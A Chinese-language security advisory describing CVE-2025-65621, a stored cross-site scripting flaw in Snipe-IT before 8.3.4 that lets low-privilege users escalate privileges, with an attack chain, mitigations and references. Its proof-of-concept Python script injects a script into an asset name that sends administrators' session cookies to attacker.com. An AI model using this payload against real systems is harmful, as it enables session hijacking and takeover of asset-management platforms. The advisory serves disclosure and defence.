CVE-2025-65621 CVSS 5.4 中危

CVE-2025-65621 Snipe-IT存储型XSS漏洞导致权限提升

披露日期: 2025-12-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-65621

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Snipe-IT

漏洞概述

CVE-2025-65621是Snipe-IT资产管理软件中的一个高危存储型跨站脚本漏洞。该漏洞存在于8.3.4之前的所有版本，允许低权限认证用户通过在系统输入字段中注入恶意JavaScript代码。当具有更高权限的管理员查看包含恶意脚本的内容时，攻击代码会在管理员的会话中执行，从而实现权限提升和敏感信息窃取。攻击者可利用此漏洞获取管理员权限，进而完全控制整个资产管理平台，访问、修改或删除系统中的敏感资产数据和用户信息。

技术细节

该漏洞源于Snipe-IT应用对用户输入内容缺乏充分的输入验证和输出编码。攻击者（低权限用户）可在资产管理相关的输入字段中插入恶意JavaScript代码。由于系统未对这些输入进行严格过滤，恶意代码被永久存储在数据库中。当管理员访问相关页面或执行特定操作时，存储的恶意脚本会被浏览器作为合法代码执行，导致会话cookie被盗、CSRF令牌泄露或执行管理员操作。

攻击链分析

STEP 1

步骤1

攻击者以低权限用户身份登录Snipe-IT系统

STEP 2

步骤2

在资产管理输入字段（如资产名称、描述或标签）中插入恶意JavaScript代码

STEP 3

步骤3

恶意代码被存储到数据库中，当管理员访问相关页面时执行

STEP 4

步骤4

攻击者通过XSS窃取管理员会话cookie或执行特权操作

STEP 5

步骤5

获得管理员权限后，攻击者可完全控制整个系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

target = 'http://target.com'

# 1. 低权限用户登录
session = requests.Session()
login_data = {
    'username': 'attacker',
    'password': 'password123'
}
session.post(f'{target}/login', data=login_data)

# 2. 在资产名称字段注入XSS payload
asset_data = {
    'name': '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>',
    'serial': '12345'
}
response = session.post(f'{target}/api/v1/hardware', json=asset_data)

# 3. 当管理员访问该资产时，cookie被窃取

影响范围

Snipe-IT < 8.3.4

防御指南

临时缓解措施

在修复版本发布前，可通过禁用非必要用户的资产管理功能、限制输入字段长度、实施严格的输入白名单验证，以及部署WAF规则来检测和阻止XSS攻击尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65621
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65621
3 Details https://www.cvedetails.com/cve/CVE-2025-65621/
4 VulDB https://vuldb.com/cve/CVE-2025-65621
5 Link http://snipeitapp.com
6 Link https://github.com/firef0x00/vulnerability-research/tree/main/CVE-2025-65621

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表